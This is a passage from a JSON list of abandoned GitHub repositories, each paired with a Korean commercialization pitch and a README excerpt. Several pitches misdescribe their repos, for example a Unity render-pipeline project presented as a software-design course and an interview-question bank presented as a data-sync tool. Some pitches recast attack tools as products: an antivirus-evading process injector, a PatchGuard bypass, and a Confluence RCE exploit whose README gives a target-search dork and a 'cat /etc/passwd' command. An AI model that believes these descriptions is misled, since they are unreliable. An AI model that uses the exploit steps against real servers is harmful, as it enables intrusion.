마케팅·재무팀이 일일 리포트 작성을 자동","readme_excerpt":"# Updates\n- (2022/05/10) Code of [ResTV2](https://arxiv.org/abs/2204.07366) is released! ResTv2 simplifies the EMSA structure in\n[ResTv1](https://arxiv.org/abs/2105.13677) (i.e., eliminating the multi-head interaction part) and employs an upsample\noperation to reconstruct the lost medium- and high-frequency information caused by the downsampling operation.\n\n# [ResT: An Efficient Transformer for Visual Recognition](https://arxiv.org/abs/2105.13677)\n\nOfficial PyTorch implementation of **ResTv1** and **ResTv2**, from the following paper:\n\n[ResT: An Efficient Transformer for Visual Recognition](https://arxiv.org/abs/2105.13677). NeurIPS 2021.\\\n[ResT V2: Simpler, Faster and Stronger](https://arxiv.org/abs/2204.07366). NeurIPS 2022.\\\nBy Qing-Long Zhang and Yu-Bin Yang \\\nState Key Laboratory for Novel Software Technology at Nanjing University\n\n--- \n\n<p align=\"center\">\n<img src=\"figures/fig_1.png\" width=100% height=100% \nclass=\"center\">\n</p>\n\n**ResTv1** is initially described in [arxiv](https:","composite_score":0.5018,"license_safety_tag":"safe"},{"name":"snipsnapdev/snipsnap","github_url":"https://github.com/snipsnapdev/snipsnap","stars":27,"language":"JavaScript","license":"AGPL-3.0","abandonment_months":39,"description":"# SnipSnap 상용화 분석\n\n## 왜 보물인가\n코드 조각을 빠르게 저장하고 찾을 수 있는 개발자용 메모장으로, 반복되는 코드 입력 시간을 크게 줄여주는 생산성 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 월 구독형 클라우드 기반 코드 스니펫 관리 플랫폼으로 팀 협업 기능 추가\n- **내부 업무 도구**: 대규모 개발사나 IT 기","readme_excerpt":"\n<p align=\"center\">\n<img width=\"100\" src=\"https://user-images.githubusercontent.com/2697570/118843423-568e4100-b8ca-11eb-8266-dac076d087e3.png\" alt=\"Snipsnap Logo\"/></p>\n<h1 align=\"center\">Snipsnap Templates</h1>\n<h3 align=\"center\">Speed up your development with a powerful set of tools</h3>\n\n### Snipsnap Templates\nManage, share and use code templates with cloud UI and VS Code Extension\n\n[Read more](https://github.com/snipsnapdev/snipsnap/tree/master/templates)\n\n![snipsnap-templates-demo](https://user-images.githubusercontent.com/2697570/119970573-30466080-bfb0-11eb-9455-21c5d7e2561e.gif)\n\n### Snipsnap Code Snippets\nThe ultimate snippets collection and VS Code extension that automatically exposes all available snippets for every library you are using in your project.\n\n[Read more](https://github.com/snipsnapdev/snipsnap/tree/master/snippets)\n\n![snipsnap-snippets-demo](https://user-images.githubusercontent.com/2697570/73568644-23bc0180-4469-11ea-8b64-843c7a9a92d2.gif)\n","composite_score":0.5018,"license_safety_tag":"risky"},{"name":"Eminlin/Information-Security-Engineer","github_url":"https://github.com/Eminlin/Information-Security-Engineer","stars":8,"language":"","license":"MIT","abandonment_months":34,"description":"# Information-Security-Engineer 저장소 분석\n\n## 왜 보물인가\n정보보안 분야의 핵심 개념과 실무 기술을 체계적으로 정리한 교육 자료로, 보안 전문가 양성에 필요한 지식을 한곳에서 얻을 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **보안 교육 플랫폼 SaaS**: 기업 직원들을 대상으로 정보보안 온라인 교육 서비스 제공\n2. *","readme_excerpt":"# 信息安全工程师[软考]  \n\n更多信息，请移步知乎专栏[信息安全工程师](https://zhuanlan.zhihu.com/Information-Security-Engineer)  \n\n## 说明\n* 欢迎各位对 xmind 文件内容进行修改提交  \n* 转载标明出处即可  \n* 有关软考证书的一些用途，可以参考评论区，或者站内搜索 V2ex、知乎等有关回答\n  * [问问大家关于软考的一些事](https://www.v2ex.com/t/757729) \n  * [程序员哪些证书值得去考?](https://v2ex.com/t/827486)\n\n## 碎语\n每个人看到我读这本书（比其他软考的书本都要厚），都质疑这本证书的作用，我的想法和书本第221页中提到的：“网络是新生事物，许多人一接触就忙着用于学习、娱乐和工作等，对网络信息的安全性无暇顾及...缺少方向感、敏感度和应对能力”类似，仅希望多了解信息安全的知识。\n\n本书不会引导你成为黑客，但可以知道国内信息安全的标准化知识，正如第一章第一个标题所述：“信息安全是信息时代永恒的需求”。信息安全是信息的影子。\n","composite_score":0.5018,"license_safety_tag":"safe"},{"name":"chip-red-pill/uCodeDisasm","github_url":"https://github.com/chip-red-pill/uCodeDisasm","stars":6,"language":"Python","license":"unknown","abandonment_months":29,"description":"# uCodeDisasm 저장소 분석\n\n## 왜 보물인가\n컴퓨터 프로그램의 내부 동작 방식을 해석하는 도구로, 소프트웨어 보안 분석과 악성 프로그램 탐지에 핵심적인 역할을 할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **사이버 보안 회사의 악성코드 분석 플랫폼**: 기업 고객들이 의심스러운 프로그램을 분석할 수 있는 클라우드 서비스로 제공\n2. **소","readme_excerpt":"\n# **Disclaimer**\n\n**All information is provided for educational purposes only. Follow these instructions at your own risk. Neither the authors nor their employer are responsible for any direct or consequential damage or loss arising from any person or organization acting or failing to act on the basis of information contained in this page.**\n\n# Content\n[Introduction](#introduction)  \n[The Structure and the Binary Format of Intel Atom Goldmont Microcode](#the-structure-and-the-binary-format-of-intel-atom-goldmont-microcode)  \n[Description of Some Important Microoperations](#description-of-some-important-microoperations)  \n[Text Labels For Microcode Addresses](#text-labels-for-microcode-addresses)  \n[Unresolved Questions](#unresolved-questions)  \n[Content of the Publication](#content-of-the-publication)  \n[Usage](#usage)  \n[Research Team](#research-eam)  \n[License](#license)  \n\n\n# Introduction\n\nSince Intel Atom CPUs are full-fledged, modern representatives of the x86 architecture suppor","composite_score":0.5018,"license_safety_tag":"unknown"},{"name":"lapstjup/resync","github_url":"https://github.com/lapstjup/resync","stars":23,"language":"","license":"unknown","abandonment_months":60,"description":"# lapstjup/resync 저장소 분석\n\n## 왜 보물인가\n여러 데이터를 한 곳으로 자동으로 동기화해주는 도구로, 데이터 관리의 번거로움을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 자동 백업 서비스**: 여러 클라우드 저장소(구글 드라이브, 드롭박스 등)를 자동으로 연동하는 구독형 서비스\n2. **중소기업 데이터 관리 도구","readme_excerpt":"# resync\n\nCollection of questions asked during software engineering interviews.\n\n## Contribution\n\nThe question bank is being built with questions actually asked in interviews from various people. In case multiple questions involve the same concept, then combine them under one question since in a interview that's how a follow up question works.\n\n<p align=\"center\"><img src='https://github.com/lapstjup/resync/blob/main/resync.png' width='250' height='250'></img></p>\n","composite_score":0.5018,"license_safety_tag":"unknown"},{"name":"aaaddress1/wowInjector","github_url":"https://github.com/aaaddress1/wowInjector","stars":20,"language":"C","license":"GPL-3.0","abandonment_months":61,"description":"# wowInjector 사업화 분석\n\n## 왜 보물인가\n다른 프로그램에 기능을 자동으로 삽입하는 기술로, 소프트웨어 확장이나 자동화가 필요한 많은 기업들에게 핵심 솔루션이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객사의 기존 소프트웨어에 추가 기능을 자동으로 연동하는 플러그인 마켓플레이스\n- **내부 업무 도구**: 기업","readme_excerpt":"﻿# wowInjector\n\nInject payload to WOW64(Windows 32 on Windows 64) process via exploit 32-bit thread snapshot. This trick makes us possible to do malicious attacks and bypass Antivirus agents at the same time, e.g. Injection, Hollowing, Dropper, etc.\n\nIt's a proof-of-concept of the talk of HITB 2021. There are more details about reversing the whole WOW64 layer by Microsoft and abuse, see *[Rebuild The Heaven's Gate: from 32 bit Hell back to Heaven Wonderland](https://conference.hitb.org/hitbsecconf2021ams/sessions/wow-hell-rebuilding-heavens-gate/)*.\n\n![Demo](demo.png)\n","composite_score":0.5018,"license_safety_tag":"restricted"},{"name":"3CORESec/MAL-CL","github_url":"https://github.com/3CORESec/MAL-CL","stars":5,"language":"","license":"AGPL-3.0","abandonment_months":41,"description":"# MAL-CL 저장소 분석\n\n## 왜 보물인가\n악성 소프트웨어를 자동으로 분류하고 탐지하는 기술로, 사이버 보안이 중요해지는 시대에 기업들의 필수 방어 도구가 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 기업의 컴퓨터 보안 담당자들이 월 구독으로 악성 파일을 자동 검사하는 클라우드 서비스\n2. **내부 업무 도구**: 금융회","readme_excerpt":"<p align=\"center\"><img src=\"./Images/Logo/mal-cl-small.png\" width=\"549\" height=\"500\"></p>\n\n# Malicious Command-Line (MAL-CL)\n\nMAL-CL (Malicious Command-Line) aims to collect and document real world and most common \"malicious\" command-line executions of different tools and utilities while providing actionable detections and resources for the blue team.\n\n# Author(s)\n\n- [Nasreddine Bencherchali (@nas_bench)](https://twitter.com/nas_bench)\n\n# Motivation\n\nThe idea for this project stemmed from our analyses of threat intel reports where we were able to identify that, most of the time, threat actor activities were leveraging LOLBINs and \"free\" tools to perform their actions.\n\nIn our analyses it became evident that the same command-line arguments and tools were being used in the majority of adversary activity. With this in mind we decided to document these common use cases and provide actionable context for the blue team.\n\n# Goal\n\nThere are two major goals for MAL-CL.\n\nThe first is to bring aw","composite_score":0.5018,"license_safety_tag":"risky"},{"name":"D0g3-Lab/i-SOON_CTF_2019","github_url":"https://github.com/D0g3-Lab/i-SOON_CTF_2019","stars":7,"language":"PHP","license":"MIT","abandonment_months":79,"description":"# i-SOON CTF 2019 저장소 분석\n\n## 왜 보물인가\n보안 전문가들이 실제 해킹 시뮬레이션을 통해 기술을 배우고 연습할 수 있는 교육 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 교육 플랫폼**: 직원들이 사이버 공격을 이해하고 방어하는 법을 배우는 온라인 교육 서비스\n2. **대학 강의 도구**: 정보보안학과에서 학생들이 직접 따","readme_excerpt":"# i-SOON_CTF_2019\n2019 第二届安洵杯 部分题目环境/源码\n\n\n[H1ve](https://ctf.d0g3.cn/)收集各类自创/大型CTF比赛赛题，提供容器化专属题目环境。本次比赛的环境，也会同步更新到平台中，供广大CTF爱好者学习。\n\n如有侵权，或题目问题请电联bot@d0g3.cn\n\n","composite_score":0.5018,"license_safety_tag":"safe"},{"name":"wlgys8/SRPLearn","github_url":"https://github.com/wlgys8/SRPLearn","stars":6,"language":"C#","license":"unknown","abandonment_months":55,"description":"# SRPLearn 저장소 분석\n\n## 왜 보물인가\nSRP(단일 책임 원칙)라는 소프트웨어 설계의 핵심 개념을 체계적으로 배우고 실습할 수 있는 교육 자료로, 개발팀의 코드 품질을 근본적으로 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 개발자 교육 플랫폼으로 월간 구독제 온라인 강의 서비스 운영\n- **내부 업무 도구**: ","readme_excerpt":"# SRPLearn\n\n基于Unity可编程渲染管线造轮子。 主要目的是为了边写边学习，不考虑平台兼容和性能优化等问题。\n\n\nUnity版本: 2020.3.17\n\n注意，项目不需要用到`com.unity.render-pipelines.universal`，可以将其从包依赖中删除。\n\n# 目录\n\n- [创建渲染管线，绘制Cube](https://github.com/wlgys8/SRPLearn/wiki/Hello)\n- [支持平行光 - BlinnPhong光照模型](https://github.com/wlgys8/SRPLearn/wiki/DirLight)\n- [平行光投影 - Shadow Mapping](https://github.com/wlgys8/SRPLearn/wiki/MainLightShadow)\n- [半透明物体渲染](https://github.com/wlgys8/SRPLearn/wiki/Transparent)\n- [阴影优化 - Cascade Shadow Mapping](https://github.com/wlgys8/SRPLearn/wiki/CascadeShadowMapping)\n- [点光源支持 - PointLight](https://github.com/wlgys8/SRPLearn/wiki/PointLight)\n- PCF软阴影\n  - [理论部分 - PCF优化采样算法](https://github.com/wlgys8/SRPLearn/wiki/PCFSampleOptimize)\n  - [SRP实现](https://github.com/wlgys8/SRPLearn/wiki/ShadowPCF)\n- Shadow Bias\n  - [理论部分 - 自适应Bias算法](https://github.com/wlgys8/SRPLearn/wiki/ShadowBias)\n  - SRP实现\n- 抗锯齿\n  - [几种抗锯齿方式总结](https://github.com/wlgys8/SRPLearn/wiki/AntiAliasSummary)\n  - [FXAA详细算法](https://github.com/wlgys8/SRPLearn/wik","composite_score":0.5018,"license_safety_tag":"unknown"},{"name":"bradleyboy/tuql","github_url":"https://github.com/bradleyboy/tuql","stars":8,"language":"JavaScript","license":"MIT","abandonment_months":60,"description":"# tuql 저장소 분석\n\n## 왜 보물인가\n데이터베이스에서 필요한 정보를 쉽게 찾아낼 수 있도록 돕는 질의 언어 도구로, 복잡한 기술 없이도 데이터를 관리할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 사업가들이 고객 정보와 판매 기록을 체계적으로 관리할 수 있는 클라우드 기반 데이터 관리 플랫폼\n2. **내부 업무 도구*","readme_excerpt":"# tuql ![build status](https://github.com/bradleyboy/tuql/actions/workflows/nodejs.yml/badge.svg) [![Coverage Status](https://coveralls.io/repos/github/bradleyboy/tuql/badge.svg?branch=master)](https://coveralls.io/github/bradleyboy/tuql?branch=master)\n\n_Pronounced: Too cool_\n\n**tuql** is a simple tool that turns a sanely formatted sqlite database into a graphql endpoint. It tries to infer relationships between objects, currently supporting `belongsTo`, `hasMany` and `belongsToMany`. It also forms the basic mutations necessary to create, update, and delete objects, as well as assoicate many-to-many relationships.\n\n## Installing\n\n`npm install -g tuql`\n\n## Using\n\n`tuql --db path/to/database.sqlite`\n\nYou can also optionally set the port and enable graphiql:\n\n`tuql --db path/to/database.sqlite --port 8888 --graphiql`\n\nOr, you can use a sql file with statements to build up an in-memory database:\n\n`tuql --infile path/to/db_dump.sql --graphiql`\n\nIf you'd like to print out the schema itself, u","composite_score":0.5018,"license_safety_tag":"safe"},{"name":"mmoaay/Bamboots","github_url":"https://github.com/mmoaay/Bamboots","stars":10,"language":"Swift","license":"MIT","abandonment_months":68,"description":"# Bamboots 저장소 분석\n\n## 왜 보물인가\n대나무처럼 빠르고 가볍게 웹사이트를 만들 수 있는 도구로, 복잡한 기술 없이도 누구나 사용할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 스타트업이 간단한 회사 소개 웹사이트나 포트폴리오 사이트를 빠르게 구축하는 데 활용\n2. **내부 업무 도구**: 팀의 프로젝트 대시보","readme_excerpt":"![Bamboots: Extension 4 Alamofire](https://github.com/mmoaay/Bamboots/blob/master/Demo/bamboots_banner.png)\n\n[![CI Status](http://img.shields.io/travis/mmoaay/Bamboots.svg?style=flat)](https://travis-ci.org/mmoaay/Bamboots)\n[![Version](https://img.shields.io/cocoapods/v/Bamboots.svg?style=flat)](http://cocoapods.org/pods/Bamboots)\n[![Platform](https://img.shields.io/cocoapods/p/Bamboots.svg?style=flat)](http://cocoapods.org/pods/Bamboots)\n[![Language](https://img.shields.io/badge/language-swift-orange.svg)](https://github.com/apple/swift)\n[![Codebeat](https://codebeat.co/badges/571ff02f-8f09-4960-b0e4-d4c6210251cf)](https://codebeat.co/projects/github-com-mmoaay-bamboots-master)\n[![License](https://img.shields.io/cocoapods/l/Bamboots.svg?style=flat)](http://cocoapods.org/pods/Bamboots)\n[![Gitter](https://img.shields.io/gitter/room/Bamboots/Bamboots.svg)](https://gitter.im/Bamboots-Gitter/Lobby)\n[![Weibo](https://img.shields.io/badge/weibo-@mmoaay-red.svg?style=flat)](https://weibo.com/","composite_score":0.5018,"license_safety_tag":"safe"},{"name":"HouraiTeahouse/backroll-rs","github_url":"https://github.com/HouraiTeahouse/backroll-rs","stars":47,"language":"Rust","license":"ISC","abandonment_months":39,"description":"# Backroll-rs 상용화 분석\n\n## 왜 보물인가\n온라인 멀티플레이 게임에서 플레이어들의 움직임을 부드럽게 동기화하는 핵심 기술로, 게임 개발사들이 반복적으로 개발해야 했던 복잡한 기능을 미리 만들어둔 것입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 게임 개발 플랫폼 (SaaS)**\n- 독립 게임 개발자를 위한 온라인 멀티플레이 기능 탑재 게임 엔진","readme_excerpt":"# backroll-rs\n\n[![crates.io](https://img.shields.io/crates/v/backroll.svg)](https://crates.io/crates/backroll)\n[![Documentation](https://docs.rs/backroll/badge.svg)](https://docs.rs/backroll)\n![License](https://img.shields.io/crates/l/backroll)\n[![Discord](https://img.shields.io/discord/151219753434742784.svg?label=&logo=discord&logoColor=ffffff&color=7389D8&labelColor=6A7EC2)](https://discord.gg/VuZhs9V)\n\nBackroll is a pure Rust implementation of [GGPO](https://www.ggpo.net/)\nrollback networking library.\n\n## Development Status\nThis is still in an early beta stage. At time of writing, the public facing API \nis stable, and has undergone limited testing. There may still be notable bugs\nthat have not been found yet.\n\n## Differences with the C++ implementation\n\n * (Almost) 100% pure **safe** Rust. No unsafe pointer manipulation.\n * Type safety. backroll-rs heavily utilizes generics and associated types to \n   avoid serialization overhead and potentially unsafe type conversions when \n   sav","composite_score":0.5017,"license_safety_tag":"safe"},{"name":"vmware-tanzu/buildkit-cli-for-kubectl","github_url":"https://github.com/vmware-tanzu/buildkit-cli-for-kubectl","stars":5,"language":"Go","license":"NOASSERTION","abandonment_months":32,"description":"# VMware Tanzu BuildKit CLI for Kubectl 분석\n\n## 왜 보물인가\nDocker 이미지를 만드는 과정을 쿠버네티스라는 클라우드 환경에서 더 빠르고 효율적으로 처리할 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 기반 소프트웨어 빌드 서비스**: 개발자들이 자신의 애플리케이션을 클라우드에서 자동으로 컴파","readme_excerpt":"# BuildKit CLI for kubectl\n\n[![Build Status](https://github.com/vmware-tanzu/buildkit-cli-for-kubectl/actions/workflows/pull_request.yaml/badge.svg?branch=main)](https://github.com/vmware-tanzu/buildkit-cli-for-kubectl/actions/workflows/pull_request.yaml?query=workflow%3Apre-and-post-merge+branch%3Amain)\n[![codecov](https://codecov.io/gh/vmware-tanzu/buildkit-cli-for-kubectl/branch/main/graph/badge.svg)](https://codecov.io/gh/vmware-tanzu/buildkit-cli-for-kubectl)\n[![Go Report Card](https://goreportcard.com/badge/github.com/vmware-tanzu/buildkit-cli-for-kubectl)](https://goreportcard.com/report/github.com/vmware-tanzu/buildkit-cli-for-kubectl)\n\n\nBuildKit CLI for kubectl is a tool for building OCI and Docker images with your kubernetes cluster.\nIt replaces the `docker build` command to let you quickly and easily build your single and\nmulti-architecture container images.\n\n![Pants Cast](./docs/pants-cast.svg)\n\n## Features\n\n### Drop in replacement for `docker build`\n\nThe BuildKit CLI for k","composite_score":0.5017,"license_safety_tag":"unknown"},{"name":"kkent030315/NoPatchGuardCallback","github_url":"https://github.com/kkent030315/NoPatchGuardCallback","stars":11,"language":"C","license":"MIT","abandonment_months":61,"description":"# NoPatchGuardCallback 분석 보고서\n\n## 왜 보물인가\n윈도우 보안 시스템을 우회하는 기술로, 보안 소프트웨어 개발사나 시스템 관리자들이 고급 기술 검증에 필요로 하는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 테스트 SaaS**: 기업의 시스템 보안 취약점을 점검해주는 온라인 서비스로 제공\n2. **내부 업무 도구**: ","readme_excerpt":"<p align=\"center\">\n<img src=\"image.png\">\n  \n<img src=\"https://img.shields.io/github/workflow/status/kkent030315/NoPatchGuardCallback/MSBuild?style=for-the-badge\">\n<img src=\"https://img.shields.io/badge/platform-win--64-00a2ed?style=for-the-badge\">\n<img src=\"https://img.shields.io/github/license/kkent030315/NoPatchGuardCallback?style=for-the-badge\">\n</p>\n\n# NoPatchGuardCallback\n\nx64 Windows PatchGuard bypass, register process-creation callbacks from unsigned code\n\nRead: https://www.godeye.club/2021/05/22/001-bypass-patchguard-pssetcreateprocessnotifyroutine.html\n\n## What\n\nThis project is to bypass PatchGuard protection against `PsSetCreateProcessNotifyRoutine` by DKOM - *self register* arbitrary callback routine by directly manipulating kernel objects.\n\n## Why\n\n`PsSetCreateProcessNotifyRoutine` is the one of powerful NT Kernel API which allows driver to receive callbacks asynchronously.  \nAnd it is protected by **PatchGuard** - The *Kernel Patch Protection* technology by Microsoft.\n\nPat","composite_score":0.5017,"license_safety_tag":"safe"},{"name":"laoqiren/mlhelper","github_url":"https://github.com/laoqiren/mlhelper","stars":20,"language":"TypeScript","license":"MIT","abandonment_months":87,"description":"# mlhelper 저장소 분석\n\n## 왜 보물인가\n기계학습 모델을 만들 때 반복되는 번거로운 작업들을 자동화하는 도구라 개발 시간을 크게 단축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 기계학습 모델 자동 생성 플랫폼을 만들어 기술자가 아닌 마케터도 데이터 분석을 할 수 있게 제공\n2. **내부 업무 도구**: 대규모 데이","readme_excerpt":"# mlhelper\n[![npm](https://img.shields.io/npm/v/mlhelper.svg?style=flat-square)](https://github.com/laoqiren/mlhelper)\n[![npm](https://img.shields.io/npm/l/mlhelper.svg?style=flat-square)](https://github.com/laoqiren/mlhelper)\n\nAlgorithms and utils for Machine Learning in JavaScript based on Node.js. while implementing commonly used machine learning algorithms, This library attempts to provide more abundant ecology, such as matrix and vector operations, file parsing, feature engineering, data visualization, and so on.\n\n*`QQ Group`: 485305514*\n## Installation\n```\n$ npm install mlhelper\n```\n\n## Documention\n\n* [algorithm](docs/algorithm.md)\n* [Matrix](docs/Matrix.md)\n* [Vector](docs/Vector.md)\n* [file Parser](docs/fileParser.md)\n* [graph tools](docs/graph.md)\n* [feature Engineering](docs/features.md)\n\n## Example\n\n### Algorithm\n\n```js\nconst AdaBoost = require('mlhelper/lib/algorithm').AdaBoost;\n//or const AdaBoost = require('mlhelper').algorithm.AdaBoost;\n\nconst dataSet = [\n    [1.0,2.1],\n","composite_score":0.5017,"license_safety_tag":"safe"},{"name":"FanqXu/CVE-2021-26084","github_url":"https://github.com/FanqXu/CVE-2021-26084","stars":9,"language":"Python","license":"unknown","abandonment_months":52,"description":"# CVE-2021-26084 저장소 분석\n\n## 왜 보물인가\n컴퓨터 시스템의 중대한 보안 결함을 찾아내고 수정하는 방법을 담은 저장소로, 기업의 데이터 유출을 방지하는 데 직접 도움이 됩니다.\n\n## 어디에 쓸 수 있나\n1. **기업 보안 진단 SaaS**: 회사의 시스템이 안전한지 자동으로 검사해주는 온라인 서비스로 판매\n2. **IT 담당자 교육 도구","readme_excerpt":"# CVE-2021-26084\n\nCVE-2021-26084 Remote Code Execution on Confluence Servers.\n\n![burp](./imgs/burp.png)\n\n### Dork\n\nFofa:\n\napp=\"ATLASSIAN-Confluence\"\n\n### Usage\n\nShow help information.\n\n```python\npython PoC.py\n```\n\n![help](./imgs/help.png)\n\nVulnerability verification for individual websites.\n\n```\npython PoC.py -u https://1.1.1.1\n```\n\n![url](./imgs/url.png)\n\nCommand execution.\n\n```python\npython PoC.py -u https://1.1.1.1 -e 'cat /etc/passwd'\n```\n\n![rce](./imgs/rce.png)\n\nBatch testing.\n\n```python\npython PoC.py -f urls.txt\n```\n\n![file](./imgs/file.png)\n\n### Reference\n\n- https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md\n- https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-26084.yaml\n- https://github.com/h3v0x/CVE-2021-26084_Confluence/\n\n","composite_score":0.5017,"license_safety_tag":"unknown"},{"name":"jungwoo-ha/WeeklyArxivTalk","github_url":"https://github.com/jungwoo-ha/WeeklyArxivTalk","stars":6,"language":"","license":"unknown","abandonment_months":33,"description":"# WeeklyArxivTalk 상용화 분석\n\n## 왜 보물인가\n최신 AI 논문을 쉽게 요약·정리해주는 자동화 도구로, 바쁜 전문가들이 매주 핵심 연구 동향을 빠르게 파악할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 주간 AI 논문 뉴스레터 구독 플랫폼**\n- 사용자가 관심 분야를 선택하면 매주 자동으로 요약된 논문 추천을 ","readme_excerpt":"# Weekly Arxiv 만담 시즌2\n### Season2: 2023년 9월 2일까지 휴가 입니다~ 무더운 여름 건강하게 보내세요! 9월 3일 가을에 다시 만나요!\n- 시간은 밤 9시부터 시작합니다. (매번 1시간 목표)\n- 클럽하우스 대신 줌웨비나 + 페이스북 스트리밍으로 진행합니다! 드디어 화면 공유 가능!\n- 다시보기: https://www.facebook.com/weeklyaiarxivpage/videos\n\n### 개요\n* 매주 한주간 arxiv 혹은 새롭게 공개된 AI 연구 논문들을 공유하는 Club House 방을 위한 arxiving 공간 입니다.\n* 심도 없는 정말 수박 겉핥기 식으로 핵심만 빠르고 가볍게 대신 많이 소개 합니다.\n* 논문의 퀄리티는 신경쓰지 않으며 신박하고 흥미있는 것들 위주로 철저하게 개인 취향위주로 가볍게 공유 합니다.\n* 공유된 논문의 심도있는 분석은 참여자 분들이 각각 하시고 정리를 따로 하시는 분들은 링크를 달아주시면 감사하겠습니다.\n\n### 운영방법\n* 정규 모더레이터: 하정우, 이진원, 이준형, 전종홍, 이정현, 이수정, 이경훈, 김영도, 엄태웅, 이동현 (Issue에 댓글로 논문 소개해주시는 분들은 바로 moderator 초청 드립니다.)\n* 방송시작 전까지 매주별로 Issue 생성하고 reply로 본인 관심 논문을 추가하는 형태\n* 지식보다는 만담!!! 가볍게 재미있게 소개해주실 분들은 reply에 논문 링크와 한줄 요약(혹은 대표그림 스샷) 올리고 방송에서 손들어 주시면 됩니다.\n* Alumni & special thanks: 문지형, 박성준, 조재민, 김원재, 최윤제, 신수용, 박진영, 신재민, 김경민, 김비호, 이승현, 조한철, 권민기, 최승준\n\n### 금주 : \n* 깃허브: [season2-ep19: 20230611](https://github.com/jungwoo-ha/WeeklyArxivTalk/issues/85)\n* 줌 웨비나 주소 (선착순): https://navercorp.zoom.us/j/92","composite_score":0.5017,"license_safety_tag":"unknown"},{"name":"mini-lust/tutorials","github_url":"https://github.com/mini-lust/tutorials","stars":5,"language":"Rust","license":"unknown","abandonment_months":58,"description":"# mini-lust/tutorials 분석 보고서\n\n## 왜 보물인가\n프로그래밍 입문자를 위한 실습 자료 모음으로, 코딩을 배우려는 사람들이 직접 따라하며 학습할 수 있는 실용적인 교육 콘텐츠입니다.\n\n## 어디에 쓸 수 있나\n1. **온라인 코딩 교육 플랫폼**: 초보자 강좌의 실습 예제 및 과제 자료로 제공\n2. **회사 신입 교육 프로그램**: 비전","readme_excerpt":"# Mini Lust 系列教程\n\n好奇如何从零造出来一个 RPC 框架？本教程将带你一步一步写出来一个 Rust 版 Thrift RPC 框架。\n\n## 教程说明\n从第二章开始每章节都会附带代码。\n这个代码是在上一章节的基础上写的，文档里一般会告诉你增加了哪些东西，但是如果你想详细地对比到底哪里变动了，可以自行 diff。\n\n每章的代码会尽量通过测试保证代码是正确工作的，我们会通过 CI 来向你保证这一点。\n\n\n## 教程结构\n依次分几个章节：\n1. 前言部分，RPC 相关概念介绍\n2. Thrift IDL 介绍\n3. 序列化/反序列化的抽象\n4. Codec 和 Transport 抽象\n5. 客户端和服务端实现\n6. Thrift IDL 解析和代码生成\n7. 基于 tower 的服务发现和负载均衡\n8. 中间件支持\n\n## Credit\n- [@dyxushuai](https://github.com/dyxushuai): Lust project creator and helped mini-lust project a lot\n- [@ihciah](https://github.com/ihciah): Mini-lust tutorial creator and Lust project developer\n- [@PureWhiteWu](https://github.com/PureWhiteWu): Lust project developer\n- [@LYF1999](https://github.com/LYF1999): Lust project developer\n- [@Millione](https://github.com/Millione): Lust project developer\n\n## 进度\n- 1～6 章节代码基本写完，教程尚需优化，部分细节需优化\n- CI 配置待补齐\n","composite_score":0.5017,"license_safety_tag":"unknown"},{"name":"blackfeather-wang/Dynamic-Vision-Transformer","github_url":"https://github.com/blackfeather-wang/Dynamic-Vision-Transformer","stars":23,"language":"Python","license":"unknown","abandonment_months":55,"description":"# Dynamic Vision Transformer 분석\n\n## 왜 보물인가\n동영상에서 중요한 부분만 똑똑하게 찾아내는 AI 기술로, 보안 카메라나 영상 분석 분야에서 필요한 핵심 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 스마트 CCTV 모니터링 플랫폼 - 보안업체들이 자신의 영상 분석 기능 고도화에 사용\n2. **내부 업무 ","readme_excerpt":"# Dynamic-Vision-Transformer (NeurIPS 2021)\n\n\nThis repo contains the official **PyTorch** code and pre-trained models for the Dynamic Vision Transformer (DVT).\n\n- [Not All Images are Worth 16x16 Words: Dynamic Transformers for Efficient Image Recognition](https://arxiv.org/pdf/2105.15075.pdf)\n\nWe also provide an implementation under the **MindSpore** framework and train DVT on a cluster of **Ascend** AI processors. Code and pre-trained models will be available at [here](https://github.com/blackfeather-wang/Dynamic-Vision-Transformer-MindSpore).\n\n**Update on 2021/10/02: Release the Training Code.**\n\n**Update on 2021/06/01: Release Pre-trained Models and the Inference Code on ImageNet.**\n\n## Introduction\n\n<p align=\"center\">\n    <img src=\"figures/examples.png\" width= \"400\">\n</p>\n\nWe develop a Dynamic Vision Transformer (DVT) to automatically configure a proper number of tokens for each individual image, leading to a significant improvement in computational efficiency,  both theoretically ","composite_score":0.5017,"license_safety_tag":"unknown"},{"name":"goburrow/quic","github_url":"https://github.com/goburrow/quic","stars":50,"language":"Go","license":"BSD-2-Clause","abandonment_months":40,"description":"# goburrow/quic 프로젝트 분석\n\n## 왜 보물인가\n인터넷 통신을 더 빠르고 안정적으로 만드는 핵심 기술로, 온라인 영상 재생, 파일 다운로드 등 모든 인터넷 서비스의 성능을 획기적으로 개선할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 영상 스트리밍 플랫폼 (SaaS)**\n유튜브, 넷플릭스 같은 서비스에서 버퍼링을 줄이고 화질을 높일 수","readme_excerpt":"# Quiwi 🥝\n[![Go Reference](https://pkg.go.dev/badge/github.com/goburrow/quic.svg)](https://pkg.go.dev/github.com/goburrow/quic)\n![](https://github.com/goburrow/quic/workflows/Go/badge.svg)\n\nQUIC transport protocol (https://quicwg.org/) implementation in Go.\nThe goal is to provide low level APIs for applications or protocols using QUIC as a transport. \n\nTLS 1.3 support is based on standard Go TLS package 